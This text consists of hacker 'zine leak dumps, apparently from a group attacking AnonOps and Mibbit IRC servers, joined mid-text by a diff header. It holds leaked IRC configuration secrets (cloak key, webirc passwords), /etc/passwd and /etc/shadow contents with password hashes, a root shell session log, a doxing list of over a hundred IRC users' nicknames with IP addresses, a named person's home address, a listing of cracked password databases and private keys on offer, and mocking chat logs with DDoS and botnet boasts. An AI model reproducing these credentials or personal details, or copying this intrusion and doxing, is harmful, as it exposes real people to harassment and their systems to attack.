<alias text="HOSTSERV" replace="PRIVMSG HostServ :$2-" requires="HostServ"
uline="yes">
<alias text="MEMOSERV" replace="PRIVMSG MemoServ :$2-" requires="MemoServ"
uline="yes">
<alias text="NS" replace="PRIVMSG NickServ :$2-" requires="NickServ" uline="yes">
<alias text="CS" replace="PRIVMSG ChanServ :$2-" requires="ChanServ" uline="yes">
<alias text="OS" replace="PRIVMSG OperServ :$2-" requires="OperServ" uline="yes"
operonly="yes">
<alias text="BS" replace="PRIVMSG BotServ :$2-" requires="BotServ" uline="yes">
<alias text="HS" replace="PRIVMSG HostServ :$2-" requires="HostServ" uline="yes">
<alias text="MS" replace="PRIVMSG MemoServ :$2-" requires="MemoServ" uline="yes">
<alias text="IDENTIFY" replace="PRIVMSG NickServ :IDENTIFY $2" requires="NickServ"
uline="yes">
<module name="m_allowinvite.so">
<module name="m_alltime.so">
<module name="m_auditorium.so">
<auditorium opvisible="no" opcansee="yes" opercansee="yes">
<module name="m_blockcolor.so">
<module name="m_botmode.so">
<module name="m_callerid.so">
<callerid maxaccepts="16" operoverride="yes" tracknick="no" cooldown="120">
<module name="m_chancreate.so">
<module name="m_chanprotect.so">
<chanprotect noservices="no" qprefix="~" aprefix="&amp;" deprotectself="yes"
deprotectothers="yes">
<module name="m_check.so">
<module name="m_chghost.so">
<module name="m_chgident.so">
<module name="m_chgname.so">
<module name="m_cloaking.so">
<cloak mode="full" key="bubrafuKuWazunustFrUvacuvezawrU4rEgu" prefix="AN-">
<module name="m_close.so">
<module name="m_clones.so">
<module name="m_conn_umodes.so">
#<module name="m_connectban.so">
#<connectban threshold="4" duration="10m" ipv4cidr="32" ipv6cidr="128">
<module name="m_dccallow.so">
<dccallow blockchat="yes" length="0" action="block">
<banfile pattern="*" action="block">
<module name="m_delayjoin.so">
<module name="m_devoice.so">
<module name="m_dnsbl.so">
<dnsbl name="DroneBL" type="bitmask" domain="dnsbl.dronebl.org" action="ZLINE"
reason="DroneBL" duration="30d" bitmask="253">
<dnsbl name="ProxyBL" type="bitmask" domain="dnsbl.proxybl.org" action="ZLINE"
reason="ProxyBL" duration="30d" bitmask="253">
<dnsbl name="efnetRBL" type="bitmask" domain="rbl.efnet.org" action="ZLINE"
reason="EFnetRBL" duration="30d" bitmask="253">
<module name="m_filter.so">
<filteropts engine="pcre">
<module name="m_globalload.so">
<module name="m_globops.so">
<module name="m_halfop.so">
<module name="m_hidechans.so">
<hidechans affectsopers="false">
<module name="m_hideoper.so">
<module name="m_inviteexception.so">
<module name="m_joinflood.so">
<module name="m_knock.so">
<module name="m_lockserv.so">
<module name="m_maphide.so">
<module name="m_messageflood.so">
<module name="m_muteban.so">
<module name="m_conn_waitpong.so">
<waitpong sendsnotice="yes" killonbadreply="no">
<module name="m_nickflood.so">
<module name="m_nicklock.so">
<module name="m_nonotice.so">
<module name="m_noctcp.so">
<module name="m_nokicks.so">
<module name="m_nonicks.so">
#Oper modules
<module name="m_operchans.so">
<module name="m_ojoin.so">
<ojoin prefix="" notice="no" op="no">
<module name="m_operjoin.so">
<operjoin channel="#opers" override="no">
<module name="m_opermotd.so">
<opermotd file="oper.motd" onoper="yes">
<module name="m_override.so">
<module name="m_password_hash.so">
<module name="m_redirect.so">
<module name="m_regex_glob.so">
<module name="m_regex_posix.so">
<module name="m_regex_pcre.so">
<module name="m_regonlycreate.so">
<module name="m_rline.so">
<module name="m_sajoin.so">
<module name="m_sakick.so">
<module name="m_samode.so">
<module name="m_sanick.so">
<module name="m_sapart.so">
<module name="m_satopic.so">
<module name="m_securelist.so">
<securehost exception="*@*.searchirc.org">
<securehost exception="*@*.netsplit.de">
<securehost exception="*@bot.search.mibbit.com">
<module name="m_sethost.so">
<module name="m_setident.so">
<module name="m_setname.so">
<module name="m_seenicks.so">
<module name="m_services_account.so">
<module name="m_showwhois.so">
<module name="m_shun.so">
<shun enabledcommands="PING PONG QUIT PART" notifyuser="no" affectopers="no">
<module name="m_spanningtree.so">
<module name="m_sslmodes.so">
<module name="m_ssl_gnutls.so">
<module name="m_sslinfo.so">
<module name="m_stripcolor.so">
<module name="m_svshold.so">
<module name="m_swhois.so">
<module name="m_timedbans.so">
<module name="m_tline.so">
#<module name="m_xline_db.so">
#Mibbit Blocks
<module name="m_cgiirc.so">
<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
mask="64.62.228.82">
<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
mask="207.192.75.252">
<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
mask="78.129.202.38">
<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
mask="109.169.29.95">
# P0ke's WebIRC
<cgihost type="webirc" password="gQhsUKatbEMPruwFqjm" mask="127.0.0.1">
:: 0x04 - b0x pwn ::
[anonops@ns1 run]$ base64 utmp
[anonops@ns1 etc]$ cat passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
shitstorm:x:500:500::/home/shitstorm:/bin/bash
anonops:x:501:501::/home/anonops:/bin/bash
owen:x:502:502::/home/owen:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
# IT GETS BETTER!
[anonops@ns1 ~]$ cat /etc/shadow | grep '\$'
root:$1$1wg7czx2$Twx4Tu6B/HhoPX4M/mCQF1:15292:0:99999:7:::
shitstorm:$1$S9rg0Dwq$cSt2nrpUetbUe4VLwpLFC1:15292:0:99999:7:::
anonops:$1$7BYkAp.7$cN4cPFCs3lXyLF19ifdUl/:15292:0:99999:7:::
owen:$1$mtzJIgPo$Vl5cLKMafgP1/2Sv8iWGi/:15292:0:99999:7:::
:: 0x05 ~ 1pS ::
# These were posted on pastebin, but it didnt seem to get as much attention
# as whoever posted it wanted it to get. All these are from a vulnerable
# CGI:IRC which incompitence extra-ordinare Power2All assured everyone was safe.
# What a fucking idiot.
ANON555 97.104.251.171 cpe-97-104-251-171.cfl.res.rr.com
ANON_Darkness 184.154.116.156 singlehop1.securitykiss.com
ANONamy 86.189.5.32 host86-189-5-32.range86-189.btcentralplus.com
AfDTags 76.85.186.139 CPE-76-85-186-139.neb.res.rr.com
Anon23845 95.140.125.37 free-125-37.mediaworksit.net
AnonFin 194.110.178.3 mail2.paf.fi
AnonymousMe 69.130.46.124 h69-130-46-124.qrtzaz.dsl.dynamic.tds.net
Azrae 74.232.155.229 adsl-074-232-155-229.sip.asm.bellsouth.net
B2F 173.84.223.70
Billy_Mays 65.183.151.13 saito.countshockula.com 109.235.51.184 tor-exit-node1.freedomservice.onion
C0d3 76.0.7.183 mo-76-0-7-183.dhcp.embarqhsd.net
CaineOfBorg 173.3.247.193 ool-ad03f7c1.dyn.optonline.net
Caleb 94.75.255.118 hosted-by.leaseweb.com
DJ-TAM 76.226.135.59 adsl-76-226-135-59.dsl.sfldmi.sbcglobal.net
DubstepMagic 60.228.226.189 CPE-60-228-226-189.lns8.woo.bigpond.net.au
Edave22 68.9.122.7 ip68-9-122-7.ri.ri.cox.net
Epsilon 173.3.247.208 ool-ad03f7d0.dyn.optonline.net
FedX 114.39.102.162 114-39-102-162.dynamic.hinet.net
GlitchMC 174.124.43.61 174-124-43-61.dyn.centurytel.net
HIv 95.140.125.37 free-125-37.mediaworksit.net
Haze 12.18.245.219
Indianrubuk 122.174.160.44 ABTS-TN-dynamic-044.160.174.122.airtelbroadband.in
Inkk 108.18.106.240 pool-108-18-106-240.washdc.fios.verizon.net
Jincux 184.91.149.18 18.149.91.184.cfl.res.rr.com
Josss 78.228.41.61 sbg57-1-78-228-41-61.fbx.proxad.net
LOLOL 0.0.7.209
LTD 174.127.99.174 174.127.99.174.static.midphase.com
Lumina 186.188.228.113
M4C 201.96.104.241 customer-201-96-104-241.uninet-ide.com.mx
Odinaga 129.72.141.219 uwyo-129-72-141-219.uwyo.edu
Power2All 82.169.240.68 82-169-240-68.ip.telfort.nl
RetSnom 138.199.70.143
Ruffah_Ras 98.233.180.236 c-98-233-180-236.hsd1.md.comcast.net
ShadowOp 75.18.160.149 adsl-75-18-160-149.dsl.pltn13.sbcglobal.net
Smeryl 77.196.253.34 34.253.196.77.rev.sfr.net
Smeyl 77.196.253.34 34.253.196.77.rev.sfr.net
Swag 66.66.103.14 cpe-66-66-103-14.rochester.res.rr.com
Thismanisadoctor 24.20.65.109 c-24-20-65-109.hsd1.or.comcast.net
UNBANMEIMPORTANTSTUFF 24.167.16.4 cpe-24-167-16-4.rgv.res.rr.com
Xerath 60.231.48.85 CPE-60-231-48-85.lns3.cha.bigpond.net.au
anon123 187.146.160.236 dsl-187-146-160-236-dyn.prod-infinitum.com.mx
anon4347 75.149.43.213 fabgraphics.com
anonymama 75.157.157.14 d75-157-157-14.bchsia.telus.net
bobbbbbb 93.182.187.4 anon-187-4.vpn.ipredator.se
boho 173.23.64.22 173-23-64-22.client.mchsi.com
br4incr4sh 81.56.209.237 server.abcdeflorent.com
chippy1337LOL 93.182.130.66 anon-130-66.vpn.ipredator.se
cokee 93.182.133.20 anon-133-20.vpn.ipredator.se
cokeee 93.182.130.66 anon-130-66.vpn.ipredator.se
comx6 190.99.231.241 dsl-emcali-190.99.231.241.emcali.net.co
digger 0.0.0.2
don 196.206.85.193 adsl196-193-85-206-196.adsl196-3.iam.net.ma
dotprod 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
e 209.212.149.109 za.l.to
eddie 166.250.1.233 233.sub-166-250-1.myvzw.com
elena197 88.104.229.97 88-104-229-97.dynamic.dsl.as9105.com
facePalmMe 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
fuckfox 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
g31g3r 137.238.147.205 s147n205.resnet.geneseo.edu
gaston 173.174.139.89 cpe-173-174-139-89.satx.res.rr.com
gawkcobbler 71.54.42.86 nc-71-54-42-86.dhcp.embarqhsd.net
gezwitscher 175.41.162.169 ec2-175-41-162-169.ap-southeast-1.compute.amazonaws.com
ghostcom 108.0.70.45 pool-108-0-70-45.lsanca.fios.verizon.net
hacker 68.45.41.140 c-68-45-41-140.hsd1.nj.comcast.net
heckl 68.68.108.159
imti 173.48.90.41 pool-173-48-90-41.bstnma.fios.verizon.net
k1tt3n 213.251.194.76
k3ymaster 173.245.64.95
koolz 98.203.26.25 c-98-203-26-25.hsd1.fl.comcast.net
lionymous 67.183.152.14 c-67-183-152-14.hsd1.wa.comcast.net
locky 186.86.129.1 Dynamic-IP-186861291.cable.net.co
loginix 70.170.36.125 ip70-170-36-125.lv.lv.cox.net
madmaster 77.247.181.162 chomsky.torservers.net
manonn 76.113.235.189 c-76-113-235-189.hsd1.mn.comcast.net
mepup 85.24.189.121 h-189-121.a189.priv.bahnhof.se
naSignal 193.138.216.101 tor-proxy.vm.31173.se
nibble 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
nikkofritz 109.215.173.29 APoitiers-257-1-142-29.w109-215.abo.wanadoo.fr
nononn 46.239.119.58 host095577.olf.sgsnet.se
nr206 80.237.226.74 tor4.anonymizer.ccc.de 193.177.160.99 static.ip-193-177-160-099.signet.nl
opmonsanto 93.182.133.20 anon-133-20.vpn.ipredator.se
pagaro_verde12 189.227.250.160 dsl-189-227-250-160-dyn.prod-infinitum.com.mx
ph33r 68.170.73.247 247.73.170.68.belairinternet.com
phusion 76.21.16.54 c-76-21-16-54.hsd1.ca.comcast.net
qwerty 173.3.247.208 ool-ad03f7d0.dyn.optonline.net
risk 202.59.80.158
savetheinternet 58.175.28.253 CPE-58-175-28-253.mqdl1.lon.bigpond.net.au
sd 0.0.7.209
sdk 201.82.181.124 c952b57c.virtua.com.br
sike333 189.178.67.80 dsl-189-178-67-80-dyn.prod-infinitum.com.mx
soldout 71.189.172.143 pool-71-189-172-143.lsanca.fios.verizon.net
sprinkles 213.46.138.76 d138076.upc-d.chello.nl
subz3r0e 41.202.225.156
triPPy 173.245.64.183 173.245.64.160
tweak_ 142.163.144.229 mtprnf0110w-142163144229.pppoe-dynamic.High-Speed.nl.bellaliant.net
u_raff_u_roose 68.43.10.243 c-68-43-10-243.hsd1.mi.comcast.net
uuuuffffffff 213.163.64.43 nl.gigabit.perfect-privacy.com
veritas 0.0.7.209
workbench 50.71.143.81
wtfCALEB 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
wtf_chuck 71.57.241.72 c-71-57-241-72.hsd1.pa.comcast.net
xent 77.247.181.162 chomsky.torservers.net
zombie 93.94.245.152 93-94-245-152.dynamic.swissvpn.net
zomfg 77.111.42.10 77-111-42-10.ipv4.tusmobil.si
zorro17 187.134.17.57 dsl-187-134-17-57-dyn.prod-infinitum.com.mx
zxcvsd 95.140.125.37 free-125-37.mediaworksit.net
:: 0x06 ~ l0l sh1t ::
Here's a bit of quotes we found funny.
_ _ _
| | | | (_)
__| | __ _| |__ ___ ___ __ _ _ ___ _ __ ___ __ _ _ __
/ _` |/ _` | '_ \ / _ \ / _ \ / _` | |/ _ \ '_ ` _ \ / _` | '_ \
| (_| | (_| | |_) | (_) | (_) | (_| | | __/ | | | | | (_| | | | |
\__,_|\__,_|_.__/ \___/ \___/ \__, |_|\___|_| |_| |_|\__,_|_| |_|
__/ |
|___/
<daboogieman> now that i'm an oper im no longer accepting PM's from anyone
because i feel that i have too much else to do ( being an oper and all)
<daboogieman> the only thing i know about irc is how to sajoin <nick> #kill
and /kill <nick>
<daboogieman> any attempt by a non-oper to chat to me will be met by instand
gline and/or kill
_
(_)
_ __ _ ___
| '_ \| |/ _ \
| |_) | | __/
| .__/|_|\___|
| |
|_|
<pie>!ban *!*@*
<anon>what the fuck
<pie>its ok i can do whatever i want because im drunk
<pie>it will be fine in the morning
_ _
| | | |
___ __ _| | ___| |__
/ __/ _` | |/ _ \ '_ \
| (_| (_| | | __/ |_) |
\___\__,_|_|\___|_.__/
<Caleb>fuck my vps just got hacked with a ddos attack
<Caleb>morning
<Caleb>hi
<Caleb>:3
<Caleb>have a nice sleep? :3
<Caleb>i had a good sleep
<Caleb>eating my lunch now
<Caleb>ohai
<Caleb>ohai!
<Caleb>ohai :3
<Caleb>my computer seems to be fucking itself at 7000 rpms.
<Caleb> just block the morons
<Caleb>hmmm
<Caleb>lol
<Caleb>sup!
<Caleb>:3
<Caleb>going to sleep for a bit bbl...
<Caleb>How do you hack with a DDOS attack?
<Caleb>my shell just got hit with 77gbps
<Caleb>im gonna destroy them when i find out who did it
<Caleb>just get a VPS/VPN and use IRSSI to stop yourself getting ddosed
@CalebNewz: somehow their hitting my ip table.
_____ _____ _ __
/ _ \ \ /\ / / _ \ '_ \
| (_) \ V V / __/ | | |
\___/ \_/\_/ \___|_| |_|
<owen>FUCK this box doesnt have wget we are screwed then
<owen>[redacted] im fucking zlineing you because you're a movement traitor
<owen>you dont even know who i really am and the connections i have
<owen>i can just call in a favor and get your personal life ruined
<owen>is there young boys here (over 18) who wanna have a chat in pm??
<owen>you HAVE to install unreal to ~/Unreal3.2
_ _____ __
/\ | | |__ \ \ / /
/ \ | |__ __ _ ) \ \_/ /
/ /\ \ | '_ \ / _` | / / \ /
/ ____ \| | | | (_| |/ /_ | |
/_/ \_\_| |_|\__,_|____| |_|
<Aha2Y>if your servers getting DDoSed just mitigate the attack
<Aha2Y>i have this awesome script i found on hackforums
<Aha2Y>it blocks ip addresses
<Aha2Y>i found a backdoored zalgo source on the internet and im gonna use
it on my network
<Aha2Y>what the fuck i am getting ddosed cos i just saw this ip in my netstat
so that means its DDoSing me right?
<Aha2Y>i'll use my script of hackforums to block it
____ ____ _ _ _
| _ \ _____ _____ _ _|___ \ / \ | | |
| |_) / _ \ \ /\ / / _ \ '__|__) | / _ \ | | |
| __/ (_) \ V V / __/ | / __/ / ___ \| | |
|_| \___/ \_/\_/ \___|_| |_____/_/ \_\_|_|
@Power2All: For the people who used CGI:IRC, my sincerely excuses for the IP
leak. I couldn't fix it in time as Nikon or Chippy DDoS't my home IP too.
@Power2All: @doxbin Oh and, I never said back when I put CGI:IRC up, that it
is deemed SAFE. I said it was online, not "SAFE", dipshit.
@doxbin: @Power2All Why would you even bother advertising it if it wasn't safe?
That just smacks of gross negligence. Turn in your Guy Fawkes mask.
@Power2All: @anonymouSabu They are all Nullrouted sofar, and some suspended by
the provider.
@Power2All: Yes, they honeypotted my IP. Using mobile connection now.
_
_ __ ___ _ __ ___ ___| | ___ ___ _ __
| '__/ _ \ '_ ` _ \/ __| |/ _ \/ _ \ '_ \
| | | __/ | | | | \__ \ | __/ __/ |_) |
|_| \___|_| |_| |_|___/_|\___|\___| .__/
|_|
D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME
Names: Rick Bonata
Address 221 FRANKLIN AVE
CUYAHOGA FALLS, OH 44221
<remsleep>i might launch at 666,666
<remsleep>idk yet
<remsleep>i've done small tests, like basically, i can take down BoA's website in minutes.
<remsleep>it takes time to send orders to 180,000 zombies :p
<remsleep>the time servers being down complicated the scanrio
<remsleep>scenario
<remsleep>once i hit 1,000,000 i will take out the .mil tld servers an main dns.
<Ian>on average, the typical non-root server is 10mbps
<remsleep>but as far as the world is concerned, i am just a host.
<remsleep>Ian: yes
<remsleep>Ian: I go after school districts, fortune 500's, car dealerships, etc.
<Ian>so you are talking about
<Ian>10,000,000mbps
<remsleep>:)
<Ian>10,000gbps
<remsleep>heuheheuhehehe
<Ian>10 terabits
<remsleep>roughly.
<remsleep>plus or minus
<remsleep>it's take years
<remsleep>and constant evasion of law enforcement
<remsleep>i've got a direct line into NCIC via telnet.
<remsleep>:D :D :D
<remsleep>verified i have gov ip's on mah shit
<remsleep>i am going to block ALL government ips
<remsleep>http://www.uaff.info/militarytracking.htm
<remsleep>fyi
<remsleep>i mean if i was a giant corporate vpn provider and they offered me like
2 mill for some ips, i would give fake ips but i would do it for the $$ lol
<remsleep>not the first time i've falsified logs for money ;p
<remsleep>i remember in 09 when i cleared all the cached ips / logs for Verizon
DHCP clients, I was getting radio signals beemed at my house :P
<remsleep>@-@
<remsleep>wonder how many warrants become invalid because of that little job :D
<remsleep>chinanet is connected to me
<remsleep>mother fuckers
<remsleep> If the FBI does come, or whomever for whatever reason, I will have
them on camera with a live feed with a 3G modem backup streaming to one of
my VDSs. I would be unstopable after that, I would sue for false arrest,
kidnapping, conspiracy to each, general fuckery as well as a large sum of
punitive damages.
<anon> Hey
<anon> 221 FRANKLIN AVE
<anon> CUYAHOGA FALLS, OH 4422
<anon> Lucky for you, I'm not in your jurisdiction ;)
<remsleep> So you're saying you're a cop?
<remsleep> And btw, that's just one of my many residential IPs in Cuyahoga
Falls Ohio
<remsleep> and my dns whois, falsified as well. :\
<anon> Yeah, ok
<anon> You should probably just /quit
<anon> If you continue to enable terrorist activity, I'll call someone who
DOES have jurisdiction
<remsleep> ..
<remsleep> Really?
<anon> Really.
<remsleep> Dude, call who you wanna call. I could care less.
<anon> Also, seriously?
<anon> 21:45:27 [basedonconfusion] -Global(services@basedonconfusion.co)-
[remsleep] Memo to ANY Law Enforcement: You are compelled to
leave this network, failure to do so will result in whatever
evidence obtained being after this point will become sealed
and unusable in court. You are tresspasing, you have been warned.
<anon> HAHAHAHAHA
<anon> I've kicked down the doors of file sharers who had similar
notices attached to their servers
:: 0x07 ~ FiL3z ::
We've enclosed some fun files for your viewing pleasure. These are probably
the best part of this dump.
Filename Description
shadow /etc/shadow, self explanatory
oper.db Anope Oper Database
chan.db Anope Channel Database
nick.db Anope NickServ Database
keys.txt AnonOps private ssl key/cert
defaults.conf InspIRCd Conf.
nick.out.txt Human readable NickServ database w/ cracked passwords,
nickname aliases, registration times, seen times, memos (LOL)
chan.out.txt Huamn readable ChanServ database w/ cracked passwords,
access lists, akick lists, badwords, ..etc.
:: 0x08 ~ exit ::
tl;dr JAJA ANONOPS ESTAN MUERTO. (LOL DEAD)
AnonOps killed Anonymous, and today, we at HEP have avenged them. We cannot
bring Anonymous back to the state it was, but we've burned the abonimation
that took its place to the ground. For that, we are proud. We hope you enjoyed
reading this little 'zine half as much as we enjoyed owning these
pseudo-activitists for the Nth time. We've personally been responsible for
nulling somewhere in the neighborhood of 50 of their servers, and will just
keep dropping them as they put more back up. Ryan Cleary had the right idea,
in trying to get Anons to spread out, but the namefags didn't want to listen.
This time, we can only hope that they do.
VIVA LA CARLOS1337!!!!!
shoutz 2 kayla, robert cavanaugh, topiary & ryan cleary and zalgo irc trojan
for fighting the good fight.

754
htp/HTP-Mibbit.txt Executable file
View File

@ -0,0 +1,754 @@
888 888 d8888 .d8888b. 888 d8P
888 888 d88888 d88P Y88b 888 d8P
888 888 d88P888 888 888 888 d8P
8888888888 d88P 888 888 888d88K
888 888 d88P 888 888 8888888b
888 888 d88P 888 888 888 888 Y88b
888 888 d8888888888 Y88b d88P 888 Y88b
888 888 d88P 888 "Y8888P" 888 Y88b
_____
88888888888 888 888 8888888888 ,-:` \;',`'-
888 888 888 888 .'-;_,; ':-;_,'.
888 888 888 888 /; '/ , _`.-\
888 8888888888 8888888 | '`. (` /` ` \`|
888 888 888 888 |:. `\`-. \_ / |
888 888 888 888 | ( `, .`\ ;'|
888 888 888 888 \ | .' `-'/
888 888 888 8888888888 `. ;/ .'
`'-._____.-'`
8888888b. 888 d8888 888b 888 8888888888 88888888888
888 Y88b 888 d88888 8888b 888 888 888
888 888 888 d88P888 88888b 888 888 888
888 d88P 888 d88P 888 888Y88b 888 8888888 888
8888888P" 888 d88P 888 888 Y88b888 888 888
888 888 d88P 888 888 Y88888 888 888
888 888 d8888888888 888 Y8888 888 888
888 88888888 d88P 888 888 Y888 8888888888 888
:: Table of Contents ::
0x01 ~ Preface
0x02 ~ tools.mibbit.com
- 0x03 ~ PM logs
0x04 ~ status.mibbit.com
0x05 ~ sidewinder.netonecom.net
0x06 ~ d0x
0x07 ~ exit
:: 0x01 - Preface ::
You may have read the about the various attention-whoring skid injections of LulzSec in the news lately, who hasn't? Apparently, anyone can pick up Havij, LFImap, or LOIC and make media headlines today. It seems they have succeeded in defacing the name of the anti-sec movement, turning it into a faux-revolutionary battle cry in the form of #antisec. However, anti-sec is not what it is being portrayed as. In actuality, anti-sec is the practice of keeping one's exploits and hacks to oneself for the good of everyone else (or personal profit, depending on who you ask). LulzSec, I would throw in a note here, but it seems I'm too late, most of you are already raided. To the rest, make your time.
Not on the front page of the latest hacking busts and takedowns, the more skilled among us know not to broadcast our various 0wnages. We silently slip in and sift through large networks. Releases are private. Obviously, when you have a group that comes along such as Lulzsec, the question is not what they will get into, but how long they will last.
More importantly, I would like to establish that the former Scene has very nearly disappeared since the rise of groups like Lulzsec. Blindly exploiting and staging large scale unjustified attacks against arbitrary organizations is not the mentality of hacking. Hacking is about curiousity. Hacking is about information. Attacking government entities so you can give the media your devoid justice statement is not hacking. It's called bullshit. I've seen enough garbage from Lulzsec releases.
Today, we would like to provide the community with a special release, exclusively for all of the skidiots on Mibbit fueling Lulzsec/#antisec efforts. Enjoy.
- HTP
targ3t:
- _ _ _ _ _
- _ __ ___ (_) |__ | |__ (_) |_
- | '_ ` _ \| | '_ \| '_ \| | __|
- | | | | | | | |_) | |_) | | |_
- |_| |_| |_|_|_.__/|_.__/|_|\__|
0wn3d:
- Axod Azander Havvy
- Hercule Joshua Kitsune
- Molkmin Pottsi Sindacious
:: 0x02 - 0wnage - tools.mibbit.com ::
[h@ck ~]$ ssh root@tools.mibbit.com
root@tools.mibbit.com's password:
Last login: Fri Aug 12 23:16:22 2011 from [redacted]
root@tools:~# uname -a
Linux tools.mibbit.com 2.6.32.16-linode28 #1 SMP Sun Jul 25 21:32:42 UTC 2010 i686 GNU/Linux
root@tools:~# cat /etc/passwd /etc/shadow
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
ntp:x:102:104::/home/ntp:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
wwwadmin:x:1000:1000::/home/wwwadmin:/bin/bash
mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
Debian-exim:x:105:107::/var/spool/exim4:/bin/false
root:$1$6793e8d9$aGW9MH6RaZmSP4Tncpwrb1:14728:0:99999:7:::
daemon:*:14728:0:99999:7:::
bin:*:14728:0:99999:7:::
sys:*:14728:0:99999:7:::
sync:*:14728:0:99999:7:::
games:*:14728:0:99999:7:::
man:*:14728:0:99999:7:::
lp:*:14728:0:99999:7:::
mail:*:14728:0:99999:7:::
news:*:14728:0:99999:7:::
uucp:*:14728:0:99999:7:::
proxy:*:14728:0:99999:7:::
www-data:*:14728:0:99999:7:::
backup:*:14728:0:99999:7:::
list:*:14728:0:99999:7:::
irc:*:14728:0:99999:7:::
gnats:*:14728:0:99999:7:::
nobody:*:14728:0:99999:7:::
libuuid:!:14728:0:99999:7:::
syslog:*:14728:0:99999:7:::
ntp:*:14728:0:99999:7:::
sshd:*:14728:0:99999:7:::
wwwadmin:$6$.EejimbY$xKAXfpd3nBlNeoQ6pBWBqh673jW2ytSmL5WoUkXaRxadV/fUIM2nQcxm1mGzk1YI9t3yQH8XMzpzSHpNv1jb00:15048:0:99999:7:::
mysql:!:15048:0:99999:7:::
Debian-exim:!:15075:0:99999:7:::
root@tools:~# ps aux | grep log
root 201 0.0 0.0 0 0 ? S Mar15 0:00 [xfslogd/0]
root 202 0.0 0.0 0 0 ? S Mar15 0:00 [xfslogd/1]
root 203 0.0 0.0 0 0 ? S Mar15 0:00 [xfslogd/2]
root 204 0.0 0.0 0 0 ? S Mar15 0:00 [xfslogd/3]
syslog 9019 0.0 0.2 21200 1288 ? Sl Mar15 1:35 rsyslogd -c4
wwwadmin 18565 0.0 0.6 5056 3360 ? S Mar31 22:01 /home/wwwadmin/loggerbot/eggdrop ./logger1
root@tools:~# ls -al /
total 96
drwxr-xr-x 22 root root 4096 Mar 15 22:22 .
drwxr-xr-x 22 root root 4096 Mar 15 22:22 ..
drwxrwxrwx 20 root root 4096 Aug 6 23:14 OLD_DATA
drwxr-xr-x 2 root root 4096 Mar 15 12:19 bin
drwxr-xr-x 2 root root 4096 Apr 29 2010 boot
drwxr-xr-x 11 root root 13640 Mar 15 12:20 dev
drwxr-xr-x 76 root root 4096 Aug 13 01:26 etc
drwxr-xr-x 3 root root 4096 Mar 15 12:31 home
drwxr-xr-x 17 root root 12288 Aug 9 00:38 lib
drwx------ 2 root root 16384 Apr 29 2010 lost+found
drwxr-xr-x 2 root root 4096 Apr 29 2010 media
drwxr-xr-x 2 root root 4096 Apr 23 2010 mnt
drwxr-xr-x 2 root root 4096 Apr 29 2010 opt
dr-xr-xr-x 117 root root 0 Mar 15 12:04 proc
drwx------ 4 root root 4096 Aug 13 02:32 root
drwxr-xr-x 2 root root 4096 Mar 15 12:20 sbin
drwxr-xr-x 2 root root 4096 Dec 5 2009 selinux
drwxr-xr-x 2 root root 4096 Apr 29 2010 srv
drwxr-xr-x 12 root root 0 Mar 15 12:04 sys
drwxrwxrwt 4 root root 4096 Aug 12 08:40 tmp
drwxr-xr-x 11 root root 4096 Aug 9 00:44 usr
